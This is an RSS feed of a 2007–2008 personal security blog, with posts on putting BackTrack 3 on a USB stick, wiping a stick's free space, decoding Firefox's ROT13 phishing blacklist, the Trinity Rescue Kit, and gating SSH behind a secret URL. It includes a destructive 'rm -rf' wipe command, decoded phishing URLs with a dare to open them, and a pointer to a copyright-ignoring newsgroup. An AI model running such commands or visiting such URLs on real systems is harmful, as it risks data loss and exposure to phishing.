      <description>&lt;p&gt;One year (and a bit) ago i wrote a post on &lt;a href=&#34;https://www.oiepoie.nl/2006/12/20/bootable-security-distro-on-your-usb-stick/&#34;&gt;how to install Backtrack 2 onto an USB stick&lt;/a&gt;. Recently the beta version of BackTrack 3 is released and the guys from BackTrack even made a special version to install on a 1GB USB stick: &lt;a class=&#34;extlink&#34; href=&#34;http://www.offensive-security.com/bt3b141207.rar.torrent&#34; target=&#34;_blank&#34;&gt;grab the torrent here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Among the many uses of BackTrack are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Penetration Testing&lt;/li&gt;
&lt;li&gt;Digital Forensics&lt;/li&gt;
&lt;li&gt;Zero Trace usage of a computer (harddisk is untouched)&lt;/li&gt;
&lt;li&gt;Wireless sniffing, WEP crack, wardriving, etc.&lt;/li&gt;
&lt;li&gt;Listening to SomaFM radio&lt;/li&gt;
&lt;li&gt;Cracking various passwords&lt;/li&gt;
&lt;li&gt;and much more….&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The USB stick version fully utilizes the space available to cram it with tools, a total of 953 MB. Also this version includes a script to make the USB stick bootable, so it’s almost childplay now to make your own hacker toolkit keychain. Here is a step by step howto.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt;&lt;br/&gt;
Mount a 1GB USB stick. If your system does not automatically mount the filesystem, have a look with &lt;b&gt;dmesg | tail&lt;/b&gt; and mount it by hand, e.g.&lt;br/&gt;
&lt;b&gt;mkdir FF ; mount /dev/sdc1 /FF&lt;/b&gt;&lt;br/&gt;
Wipe all info from the stick: &lt;b&gt;rm -rf /FF/*&lt;/b&gt; and check there is enough space available:&lt;/p&gt;
&lt;pre&gt;
[root ~]# df -h /FF
Filesystem            Size  Used Avail Use% Mounted on
/dev/sdf1             972M  4.0K  972M   1% /FF
&lt;/pre&gt;
&lt;p&gt;You will need at least 953 MB there.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 2&lt;/strong&gt;&lt;br/&gt;
Download BT3 from the &lt;a class=&#34;extlink&#34; href=&#34;http://www.offensive-security.com/bt3b141207.rar.torrent&#34; target=&#34;_blank&#34;&gt;torrent&lt;/a&gt; or use one of the &lt;a class=&#34;extlink&#34; href=&#34;http://www.remote-exploit.org/backtrack_download.html&#34; target=&#34;_blank&#34;&gt;mirrors&lt;/a&gt; to download with your browser, wget, curl, whatever.&lt;br/&gt;
Check the checksum with &lt;b&gt;md5sum&lt;/b&gt; or &lt;b&gt;sha1sum&lt;/b&gt; and if you’re paranoid, use both.&lt;/p&gt;
&lt;p&gt;Extract the contents onto the USB stick:&lt;/p&gt;
&lt;pre&gt;
[root ~]# cd /FF
[root /FF]# unrar x /tmp/bt3b141207.rar
[root /FF]# ls -l
drwxrwxr-x 6 root root 4096 2007-12-13 18:50 boot
drwxrwxr-x 7 root root 4096 2007-12-13 18:22 BT3
-rw-rw-r-- 1 root root  284 2007-12-13 19:13 INSTALL.txt
&lt;/pre&gt;
&lt;center&gt;&lt;/center&gt;
&lt;p&gt;Read the extensive installation information&lt;/p&gt;
&lt;pre&gt;
[root /FF]# more INSTALL.txt 
USB Install:
&lt;p&gt;Copy the &amp;ldquo;boot&amp;rdquo; and &amp;ldquo;BT3&amp;rdquo; Directory to the root of your USB device.
Under Linux, change directory to the freshly copied /boot directory on the USB device.
MAKE sure your&amp;rsquo;re in the &amp;ldquo;boot&amp;rdquo; directory on the USB device!
run ./boostinst.sh
unmount usb device.
Voila.
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;br/&gt;
And do the deed:&lt;/p&gt;
&lt;pre&gt;
[root /FF]# cd boot
[root /FF/boot]#./bootinst.sh
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                        Welcome to Slax boot installer                         
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
&lt;p&gt;This installer will setup disk /dev/sdc1 to boot only Slax.&lt;/p&gt;
&lt;p&gt;Warning! Master boot record (MBR) of /dev/sdc will be overwritten.
If you use /dev/sdc to boot any existing operating system, it will not work
anymore. Only Slax will boot from this device. Be careful!&lt;/p&gt;
&lt;p&gt;Press any key to continue, or Ctrl+C to abort&amp;hellip;
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;press return, and:&lt;/p&gt;
&lt;pre&gt;
Flushing filesystem buffers, this may take a while...
Setting up MBR on /dev/sdc...
The Master Boot Record of  /dev/sdc  has been updated.
Activating partition /dev/sdc1...
No partition table modifications are needed.
Updating MBR on /dev/sdc...
Setting up boot record for /dev/sdc1...
Disk /dev/sdc1 should be bootable now. Installation finished.
&lt;p&gt;Read the information above and then press any key to exit&amp;hellip;
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;All that is left to do is reboot your system and boot from the USB stick.&lt;br/&gt;
On Dell laptops you might have to press &lt;b&gt;F12&lt;/b&gt; to select the boot medium.&lt;/p&gt;
&lt;p&gt;If everything went well, you will be greeted by the boot image:&lt;br/&gt;
&lt;img border=&#34;0&#34; halign=&#34;center&#34; src=&#34;https://www.oiepoie.nl/pics/bt3-boot.png&#34;/&gt;&lt;br/&gt;
Have fun &amp;amp; stay safe.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Gratis online boeken over Linux, Programmeren, Security</title>
      <link>https://www.oiepoie.nl/2008/01/11/gratis-online-boeken-over-linux-programmeren-security/</link>
      <pubDate>Fri, 11 Jan 2008 22:56:25 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2008/01/11/gratis-online-boeken-over-linux-programmeren-security/</guid>
      <description>&lt;p&gt;Eigenlijk is december &lt;strong&gt;de&lt;/strong&gt; maand van de lijstjes, maar ik kwam ergens een lijstje van online Linux boeken tegen, ging op zoek naar andere lijstjes en gratis online boeken en kon het toen toch niet nalaten om een &lt;a href=&#34;https://www.oiepoie.nl/gratis_boeken&#34;&gt;superlijst van gratis boeken&lt;/a&gt; te maken. &lt;/p&gt;
&lt;p&gt;Nu nog een &lt;a class=&#34;extlink&#34; href=&#34;http://www.irextechnologies.com/products/iliad&#34; target=&#34;_new&#34;&gt;iLiad&lt;/a&gt; of een &lt;a class=&#34;extlink&#34; href=&#34;http://www.amazon.com/Kindle-Amazons-Wireless-Reading-Device/dp/B000FI73MA&#34; target=&#34;_new&#34;&gt;kindle&lt;/a&gt; om al dat online spul eens fatsoenlijk te kunnen lezen.&lt;br/&gt;
&lt;strong&gt;Tip:&lt;/strong&gt;Er is ook een nieuwsgroep: &lt;a class=&#34;extlink&#34; href=&#34;news://alt.binaries.e-book.technical&#34;&gt;alt.binaries.e-book.technical&lt;/a&gt; waar veel leuke boeken in worden gepost om te downloaden, maar daar nemen ze het met Copyright niet zo nauw.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>completely removing information from an USB stick</title>
      <link>https://www.oiepoie.nl/2007/11/28/completely-removing-information-from-an-usb-stick/</link>
      <pubDate>Wed, 28 Nov 2007 18:15:46 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2007/11/28/completely-removing-information-from-an-usb-stick/</guid>
      <description>&lt;p&gt;Perhaps you have seen those movies where a person is questioned about things from the past. Of course he doesn’t remember all those embarrassing things the interrogator wants to know. Then a hypnotherapist is called in and puts the man under hypnosis and all details come pouring out.&lt;br/&gt;
A USB stick acts the same. If you look at it from Windows explorer or you do a mount + ls under Linux you see only the information which is on the surface. But beneath it a lot of other information is often lingering, information which maybe could be embarrassing if it falls into the wrong hands.&lt;br/&gt;
The reason for this is that when files are deleted from the USB stick, or from a harddisk for that matter, they not actually wiped. The only thing that happens is that the space is marked free in the File Allocation Table. But as long as this space is not overwritten by new files, the information still remains on the device.&lt;br/&gt;
That is why undelete tools can recover files for you.&lt;/p&gt;
&lt;p&gt;A potential risk is that when you hand over your thumbdrive to someone for copying info on or of the stick, they might just copy a complete image of the stick to their laptop. There is even a handy program: &lt;strong&gt;USBdumper&lt;/strong&gt; which provides this functionality. Afterwards they can do a forensic analysis of the data, for instance using &lt;a class=&#34;extlink&#34; href=&#34;http://foremost.sourceforge.net/&#34; target=&#34;_blank&#34;&gt;foremost&lt;/a&gt; and see what kind of residual data they can retrieve. On linux you could even do a &lt;strong&gt;strings &amp;lt; USBimage.dd&lt;/strong&gt; to get a quick view.&lt;/p&gt;
&lt;p&gt;So how to avoid this risk? If you are on a Windows system, there is a free tool called &lt;a class=&#34;extlink&#34; href=&#34;http://www.heidi.ie/eraser/&#34; target=&#34;_blank&#34;&gt;eraser&lt;/a&gt; which securely wipes all residual data of a device. For Linux there are a number of tools, for instance &lt;a class=&#34;extlink&#34; href=&#34;http://wipe.sourceforge.net/&#34; target=&#34;_blank&#34;&gt;wipe&lt;/a&gt;, but it is more fun to do it by hand and know what you are doing.&lt;/p&gt;
&lt;p&gt;Let’s say i plug in my USB stick and mount it under: &lt;strong&gt;/media/disk&lt;/strong&gt;&lt;br/&gt;
When i execute a &lt;strong&gt;df -k&lt;/strong&gt; it displays how much space is free and therefore the number of bytes of hidden information there possibly are on the stick:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# df -k /media/disk/
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/sdb1               249336     60736    188600  25% /media/disk
&lt;/pre&gt;
&lt;p&gt;To completely obliterate all data, we need to overwrite all information with something else. If this were a harddrive, the specialists say you need to overwrite the data a fair number of times with random bytes, otherwise it’s possible that the NSA can still reconstruct the original bits from looking at the magnetic patterns on the disk. But since we are talking microchips here, anything will do. The fastest way would be to read zero’s from /dev/null, but we will use /dev/urandom just for the fun of it 😉&lt;/p&gt;
&lt;p&gt;Since there are 188600 blocks of 1 kbyte free, we need to write exactly that amount of data to the USB drive:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# cd /media/disk/
# dd if=/dev/urandom of=rnd.bin bs=1k count=188600
188600+0 records in
188600+0 records out
193126400 bytes (193 MB) copied, 52.3836 s, 3.7 MB/s
&lt;h1 id=&#34;df--h-&#34;&gt;df -h .&lt;/h1&gt;
&lt;p&gt;Filesystem            Size  Used Avail Use% Mounted on
/dev/sdb1             244M  244M     0 100% /media/disk&lt;/p&gt;
&lt;h1 id=&#34;sync&#34;&gt;sync&lt;/h1&gt;
&lt;h1 id=&#34;ls--l&#34;&gt;ls -l&lt;/h1&gt;
&lt;p&gt;total 188640
drwxr-xr-x 2 root root      4096   2007-11-22 15:39 porn_collection
drwxr-xr-x 2 root root      4096   2007-11-21 14:11 passwords
-rwxr-xr-x 1 root root 193126400 2007-11-28 15:43 rnd.bin&lt;/p&gt;
&lt;h1&gt;&lt;/h1&gt;
&lt;h1 id=&#34;hexdump--c-rndbin--head--6&#34;&gt;hexdump -C rnd.bin | head -6&lt;/h1&gt;
&lt;p&gt;00000000  6b 9d 85 95 6c 41 00 56  30 c5 f4 49 0a 90 ed 5a  |k&amp;hellip;lA.V0..I&amp;hellip;Z|
00000010  54 eb df 6d 4e 53 7a 39  33 a8 21 44 f7 a7 df 61  |T..mNSz93.!D&amp;hellip;a|
00000020  6a 33 f6 77 c1 cb d4 46  6e ab 57 0d 28 8e eb 13  |j3.w&amp;hellip;Fn.W.(&amp;hellip;|
00000030  f3 0d bd 28 eb 96 54 6c  21 ec d9 91 b8 4e ea 50  |&amp;hellip;(..Tl!&amp;hellip;.N.P|
00000040  fa 98 8e 78 0c d0 6c 49  7d 4a c6 b9 37 87 84 21  |&amp;hellip;x..lI}J..7..!|
00000050  ad 25 a5 fa 6a 52 62 ff  54 ae 77 ba 9d 45 4d a3  |.%..jRb.T.w..EM.|
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;That looks alright, since &lt;strong&gt;188600 * 1024 = 193126400&lt;/strong&gt; and sync is needed to flush the data from the write cache to the USB disk.&lt;br/&gt;
The only thing left to do is remove the random blob again (but now you know that what happens is that the space is marked free in the File Allocation Table and our random bytes remain in place), sync and unmount:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# rm -f rnd.bin
# sync
# cd
# df -k /media/disk/
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/sdb1               249336     60736    188600  25% /media/disk
# umount /media/disk
&lt;/pre&gt;
&lt;p&gt;And as you can see we are spacewise exactly where we started from.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Caveat lector!&lt;/strong&gt; This trick only protects you from somebody recovering deleted information. If you got private files on the stick, use cryptography to protect those. &lt;a class=&#34;extlink&#34; href=&#34;http://www.truecrypt.org/&#34; target=&#34;_blank&#34;&gt;TrueCrypt&lt;/a&gt; is a very nice program you can use. If you choose a simple password to access the encrypted files, you might as well use no crypto at all.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Sniffing Google’s blacklist for firefox</title>
      <link>https://www.oiepoie.nl/2007/11/25/sniffing-googles-blacklist-for-firefox/</link>
      <pubDate>Sun, 25 Nov 2007 16:40:05 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2007/11/25/sniffing-googles-blacklist-for-firefox/</guid>
      <description>&lt;p&gt;Firefox 2 has a new security feature which protects you from entering private data on &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Phishing&#34; target=&#34;_blank&#34;&gt;phishing&lt;/a&gt; websites or getting infected with malware on a website which promises you heaven and earth.&lt;br/&gt;
Protection is done by comparing the website address (&lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Url&#34; target=&#34;_blank&#34;&gt;URL&lt;/a&gt;against a so called &lt;a extlink=&#34;&#34; href=&#34;http://en.wikipedia.org/wiki/Blacklist#Computing&#34; target=&#34;_blank class=&#34;&gt;blacklist&lt;/a&gt;. The blacklist is maintained by the good folks at Google, they take care of updating the blacklist regulary and firefox automagically downloads new versions.&lt;br/&gt;
Curious by nature, i wanted to know which websites were in the blacklist, so i took a peek in my .mozilla/firefox/… directory where all the users stuff is stored. The blacklist itself is easy identified by it’s name: &lt;strong&gt;urlclassifier2.sqlite&lt;/strong&gt; and the extension betrays what kind of system is used to store the bad sites: &lt;strong&gt;sqlite&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Sqlite&#34; target=&#34;_blank&#34;&gt;SQLite&lt;/a&gt; is actually a database program, but in it’s simplest form. You don’t need to run a database engine and setup permissions, etc. But the complete database is stored into a file. So this is the &lt;strong&gt;KIS&lt;/strong&gt; principle to the max, and it works great as long as the database doesn’t grow to large or to complex.&lt;/p&gt;
&lt;p&gt;Next thing to do is fire up sqlite and have a look at the structure of the database:&lt;/p&gt;
&lt;pre&gt;
$ sqlite3  urlclassifier2.sqlite
SQLite version 3.4.2
Enter &#34;.help&#34; for instructions
sqlite&amp;gt; .tables
goog_black_enchash goog_black_url goog_white_domain goog_white_url
sqlite&amp;gt; .schema
CREATE TABLE &#39;goog_black_enchash&#39; (key TEXT PRIMARY KEY, value TEXT);
CREATE TABLE &#39;goog_black_url&#39; (key TEXT PRIMARY KEY, value TEXT);
CREATE TABLE &#39;goog_white_domain&#39; (key TEXT PRIMARY KEY, value TEXT);
CREATE TABLE &#39;goog_white_url&#39; (key TEXT PRIMARY KEY, value TEXT);
&lt;/pre&gt;
&lt;p&gt;Looks simple enough, the bad sites are probably in: goog_blac_url&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
qlite&amp;gt; select * from goog_black_url LIMIT 3;
uggc://ybtva.zlfcnpr.psz.shfrnpgvba.hfre.fcynfu.ubzr.zlgbxra.76701n2644n8605.pn0qpor.pbz/vaqrk.cuc|c
uggc://ealfcnprv.pbz/vaqrk.pszshfrnpgvba=ybtva.cebprff&amp;amp;ZlGbxra-wrrqk4r1ssn-s3kg3k2ns0-4r3-sfs3n421-s7goskks3ks231.ugz|c
uggc://eeaelfcnpr.pbz/vaqrk.psz-shfrnpgvba657Qybtva.cebprff8526ZlGbxraf79843964886883084155.ugz|c
sqlite&amp;gt; .quit
&lt;/pre&gt;
&lt;p&gt;Hmm, it &lt;a class=&#34;extlink&#34; href=&#34;http://wiki.mozilla.org/Safe_Browsing:_Design_Documentation&#34; target=&#34;_blank&#34;&gt;turns out&lt;/a&gt; that the content is encoded through the famous &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Rot13&#34; target=&#34;_blank&#34;&gt;ROT13&lt;/a&gt; methode. The reason being that the file otherwise might be flagged as harmfull by locally running antivirus software.&lt;/p&gt;
&lt;p&gt;So we need a ROT13 decoder, this is easilly done with the unix utility &lt;strong&gt;tr&lt;/strong&gt; and the complete construct snugly fits into a oneliner:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
echo &#34;SELECT * FROM goog_black_url LIMIT 3;&#34; | sqlite3 \
urlclassifier2.sqlite | tr N-ZA-Mn-za-m A-Za-z
&lt;/pre&gt;
&lt;p&gt;Which will output something like:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
http://login.myspace.cfm.fuseaction.user.splash.home.mytoken.76701a2644a8605.ca0dcbe.com/index.php|p
http://rnyspacei.com/index.cfmfuseaction=login.process&amp;amp;ZyGoken-jeedx4e1ffa-f3xt3x2af0-4e3-fsf3a421-f7tbfxxf3xf231.htm|p
http://rrnryspace.com/index.cfm-fuseaction657Qlogin.process8526ZyGokens79843964886883084155.htm|p
&lt;/pre&gt;
&lt;p&gt;If you’re brave, you might cut ‘n paste one of the URL’s in your firefox browser and see what happens 😉&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Caught a virus? Trinity to the rescue!</title>
      <link>https://www.oiepoie.nl/2007/08/04/caught-a-virus-trinity-to-the-rescue/</link>
      <pubDate>Sat, 04 Aug 2007 12:45:35 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2007/08/04/caught-a-virus-trinity-to-the-rescue/</guid>
      <description>&lt;p&gt;Last week we detected some PC’s in the network behaving badly. The were sending a massive amount of ping packets to one host on the Internet, so some sort of &lt;b&gt;DoS&lt;/b&gt; (Denial of Service) attack. When we investigated the problem there was nog sign of the culprit at first, also McAfee which was installed and running had not detected anything abnormal going on.&lt;br/&gt;
What most people do next is load lots of tools on the PC and try to discover the hidden programs responsible for all this havoc. But actually there is a much simpler approach.&lt;/p&gt;
&lt;p&gt;Today there is a lot of money to be earned by sending SPAM. But since sending SPAM is illegal in a lot of countries, the challange is to keep sending out these giant amounts of SPAM e-mail without being caught. The way to do this is by “owning” a lot of computers of unaware home users and send the e-mails through these systems. So if a recipient traces back the SPAM e-mail, he only sees the home computer as the source.&lt;/p&gt;
&lt;p&gt;To be able to control these computers, the hacker needs to infect them with something that installs a &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Backdoor_%28computing%29&#34; target=&#34;_blank&#34;&gt;&lt;b&gt;backdoor&lt;/b&gt;&lt;/a&gt;. The backdoor is the way in for the hacker to control the computer and the program which installs the backdoor is often a &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29&#34; target=&#34;_blank&#34;&gt;&lt;b&gt;trojan&lt;/b&gt;&lt;/a&gt; named after the trojan horse strategy of the greek.&lt;br/&gt;
Such an trojan might be an e-mail with the message that you received a postcard from a friend, neighbor or worshipper. To see the postcard you need to click on a link, and that link contains &lt;i&gt;postcard.exe&lt;/i&gt;. Since you are curious by nature, you of course click on the link and execute the postcard program.&lt;br/&gt;
You might even see a postcard, but meanwhile a program is covertly installed on your computer and your system becomes a marionette to the hacker.&lt;/p&gt;
&lt;p&gt;It is important for the hacker to keep his program hidden, because the longer it stays on your computer, the longer he can make money out of it. A way to hide programs from other programs (like you antivirus) is by using &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Rootkit&#34; target=&#34;_blank&#34;&gt;rootkit&lt;/a&gt; technology. A rootkit installs itself inside or just above the operating system. If you start the taskmanager to look at all the programs that are running, the taskmanager requests this information from the operating system. But instead of communicating with the OS, it really communicates through the rootkit, and the rootkit filters out it’s own existence when sending back the response from the OS to the taskmanager. So effectively the rootkit is a cloaking device which makes it own existence and the existence of the backdoor invisible.&lt;/p&gt;
&lt;p&gt;The simple approach i mentioned to finding this kind of software is by eliminating the Operating System when you look for this kind of hidden software. The way we do that is by booting a different Operating System (known to be clean of rootkits) and from there start our search for the culprits. We even assure that the booted OS can not be infected with malware by running it from a read-only medium (i.e. a cdrom).&lt;/p&gt;
&lt;p&gt;&lt;a class=&#34;extlink&#34; href=&#34;http://trinityhome.org/Home/index.php?wpid=1&amp;amp;front_id=12&#34; target=&#34;_blank&#34;&gt;&lt;strong&gt;Trinity Rescue Kit&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;There are some other bootable cdrom’s out there with antivirus products on it, but &lt;strong&gt;TRK&lt;/strong&gt; is different in that it supports 4 (&lt;strong&gt;four!&lt;/strong&gt;) different antivirus products and they are all legal versions for you to use. Apart from the antivirus bit, TRK also has these (and more) features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;easily reset windows passwords&lt;/li&gt;
&lt;li&gt;4 different virusscan products integrated in a single uniform commandline with online update capability&lt;/li&gt;
&lt;li&gt;full ntfs write support thanks to ntfs-3g (all other drivers included as well)&lt;/li&gt;
&lt;li&gt;clone NTFS filesystems over the network&lt;/li&gt;
&lt;li&gt;wide range of hardware support (kernel 2.6.19.2 and recent kudzu hwdata)&lt;/li&gt;
&lt;li&gt;easy script to find all local filesystems&lt;/li&gt;
&lt;li&gt;self update capability to include and update all virusscanners&lt;/li&gt;
&lt;li&gt;full proxyserver support.&lt;/li&gt;
&lt;li&gt;run a samba fileserver (windows like filesharing)&lt;/li&gt;
&lt;li&gt;run a ssh server&lt;/li&gt;
&lt;li&gt;recovery and undeletion of files with utilities and procedures&lt;/li&gt;
&lt;li&gt;recovery of lost partitions&lt;/li&gt;
&lt;li&gt;evacuation of dying disks&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Start with downloading the TRK iso from: &lt;a class=&#34;extlink&#34; href=&#34;http://trinityhome.org/Home/index.php?wpid=5&amp;amp;front_id=12&#34; target=&#34;_blank&#34;&gt;here&lt;/a&gt; and burn it on a cdrom, for instance with Nero (here is a &lt;a class=&#34;extlink&#34; href=&#34;http://www.wizardskeep.org/mainhall/tutor/neroiso.html&#34; target=&#34;_blank&#34;&gt;good tutorial&lt;/a&gt; on how to burn iso’s with Nero).&lt;br/&gt;
Put the cdrom in your computer and reboot, when the BIOS kicks in you might need to press a key to get a boot menu and select the cdrom to boot from (on Dell computer, press F12). When you see the TRK boot screen (click on the image for a larger version):&lt;br/&gt;
&lt;a href=&#34;https://www.oiepoie.nl/pics/trk.gif&#34; target=&#34;_blank&#34;&gt;&lt;img align=&#34;right&#34; src=&#34;https://www.oiepoie.nl/pics/trk.png&#34;/&gt;&lt;/a&gt;&lt;br/&gt;
press enter to continue booting the default option. After a lot of text scrolling over your screen you will end up with a prompt, indicating that trinity as ready to obey your commands. To start scanning your computer for viruses, all you have to do is type in:&lt;br/&gt;
&lt;code&gt;virusscan -a avg&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This will mount all the Windows disks, update the virusscanner to the latest signatures and start scanning. Apart from selecting the &lt;b&gt;AVG&lt;/b&gt; virusscanner, you can also choose to use: ClamAV by specifying “clam”, Bitdefender (bde) and F-Prot (fprot). But we had very good results with AVG. Of course if you are really paranoid, you can run them all four sequentially.&lt;/p&gt;
&lt;p&gt;For the update to be successfull you will need an Internet connection  on the computer. If the computer is detached from the network, you can first boot TRK on a different computer with Internet and then give the command:&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;http://trinityhome.org/Home/index.php?wpid=46&amp;amp;front_id=12&#34; target=&#34;_blank&#34;&gt;updatetrk&lt;/a&gt;, this will update all four virusscanners and generate a new iso image from which you can burn a new updated cdrom.&lt;/p&gt;
&lt;p&gt;When one of the virusscanners has found something fishy and has deleted of renamed the file, you can reboot Windows and be sure that the rootkit is not operational anymore. It is wise (now you know the name of the malware) to run a targeted removal tool for the malware, because they will clean up the registry as well.&lt;/p&gt;
&lt;p&gt;Some other neat thing TRK can do is copy itself to an USB stick so you can boot it from there with &lt;b&gt;trk2usb&lt;/b&gt; or start a fileserver so you can access all the disks from an other computer on the same network with: &lt;b&gt;fileserver&lt;/b&gt;.&lt;br/&gt;
For a complete overview of it’s capabilities, type &lt;b&gt;trkhelp&lt;/b&gt; or have a look: &lt;a class=&#34;extlink&#34; href=&#34;http://trinityhome.org/trk/prtdocs/&#34; target=&#34;_blank&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;i&gt;Have fun &amp;amp; stay clean…&lt;/i&gt;&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>secure ssh access to your server</title>
      <link>https://www.oiepoie.nl/2007/06/03/secure-ssh-access-to-your-server/</link>
      <pubDate>Sun, 03 Jun 2007 13:30:26 +0200</pubDate>
      
      <guid>https://www.oiepoie.nl/2007/06/03/secure-ssh-access-to-your-server/</guid>
      <description>&lt;p&gt;&lt;b&gt;Every access to your system is a security threat.&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Let’s focus on &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Ssh&#34; target=&#34;_blank&#34;&gt;ssh (Secure Shell)&lt;/a&gt;.&lt;br/&gt;
Even when there is no know security bug for ssh, hackers might have found a way in which they share (or sell) between them and which hasn’t surfaced yet. Even if there is no security bug at all for ssh, access mostly depends on username/password combinations and we all know what a weak system that is, especially when used from untrusted systems.&lt;/p&gt;
&lt;p&gt;We can make life a little bit more secure by using a trick.&lt;br/&gt;
ssh access is blocked by default using iptables, but by visiting a secret URL on your website ssh access from that ip-address is turned on. You will still need username and password to access the box, but this way portscanners won’t detect an ssh server running.&lt;/p&gt;
&lt;p&gt;We will need a little script which extracts the ip-address from the computer which accessed the webpage. The script will generate a 404 Error page (and HTTP 404 Error headers to fool the clever hacker):&lt;/p&gt;
&lt;p&gt;[php]&lt;br/&gt;
&lt;?php #set some variables
$TMPFILE=&#34;/tmp/allow_sshd.tmp&#34;;
$IP=$_SERVER[&#34;REMOTE_ADDR&#34;];
&lt;p&gt;#open the file for writing, suppress errors (remove @ to see errors)
if(@$F = fopen(&amp;quot;$TMPFILE&amp;quot;,&amp;ldquo;w&amp;rdquo;)) {
#write the ip to the file
fputs($F,$IP);
#close the file
fclose($F);
}
header(&amp;ldquo;HTTP/1.1 404 Not Found&amp;rdquo;);
?&amp;gt;&lt;br/&gt;
&lt;br/&gt;&lt;/p&gt;
&lt;/p&gt;&lt;br/&gt;
&lt;br/&gt;
&lt;title&gt;404 Not Found&lt;/title&gt;&lt;br/&gt;
&lt;h1&gt;Not Found&lt;/h1&gt;
&lt;p&gt;The requested URL /secret-url.php was not found on this server.&lt;/p&gt;
&lt;hr/&gt;
&lt;address&gt;Apache Server at &lt;a href=&#34;mailto:webmaster@yourserver.com&#34;&gt;www.yourserver.com&lt;/a&gt; Port 80&lt;/address&gt;
&lt;p&gt;&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
[/php]&lt;/p&gt;
&lt;p&gt;The ip-address is written to a file in /tmp. As you might have noticed, there is no variable passing in the URL (e.g. http://www.yourserver.com/secret-url.php?ip=192.168.10.1 ) because these are potential security loopholes. Also the script itself uses a simple message passing algorithm to get the relevant data (the ip-address) to iptables, this way there is no direct coupling between an global accessable webpage and iptables.&lt;/p&gt;
&lt;p&gt;We will use a bash script to read the ip-address and configure iptables:&lt;/p&gt;
&lt;p&gt;[code]&lt;br/&gt;
#!/bin/bash&lt;br/&gt;
TMPFILE=”/tmp/allow_sshd.tmp”&lt;br/&gt;
LOGFILE=”/var/log/allow_sshd.log”&lt;br/&gt;
IP=`&amp;lt; ${TMPFILE}`
DATE=`date`
# timeframe for communications to start:
SECONDS=&#34;300&#34;
LOCKFILE=&#34;/tmp/allow_sshd.lck&#34;
&lt;p&gt;if [ -s &amp;ldquo;${TMPFILE}&amp;rdquo; ] ; then
#check for a lock file
if [ ! -e &amp;ldquo;${LOCKFILE}&amp;rdquo; ] ; then
#create the lock file to prevent more than one of these running
/bin/touch ${LOCKFILE}
#write to the log
echo &amp;ldquo;${DATE}: SSHD started from ${IP}&amp;rdquo; &amp;gt;&amp;gt; ${LOGFILE}&lt;br/&gt;
#remove the temp file&lt;br/&gt;
/bin/rm -f ${TMPFILE} &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&lt;/p&gt;&lt;/p&gt;
&lt;p&gt;        iptables -I INPUT -p tcp –dport 22 -s ${IP} -j ACCEPT&lt;br/&gt;
        #wait SECONDS&lt;br/&gt;
        sleep ${SECONDS}&lt;/p&gt;
&lt;p&gt;        iptables -D INPUT -p tcp –dport 22 -s ${IP} -j ACCEPT&lt;br/&gt;
        #remove the lock file to allow another copy to run&lt;br/&gt;
        /bin/rm -f ${LOCKFILE}&lt;br/&gt;
    else&lt;br/&gt;
        #log multiple copy attempts&lt;br/&gt;
        echo “${DATE}: SSHD multiple copy attempt!” &amp;gt;&amp;gt; ${LOGFILE}&lt;br/&gt;
        #remove temp file&lt;br/&gt;
        /bin/rm -f ${TMPFILE} &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&lt;br/&gt;
    fi&lt;br/&gt;
fi&lt;br/&gt;
[/code]&lt;/p&gt;
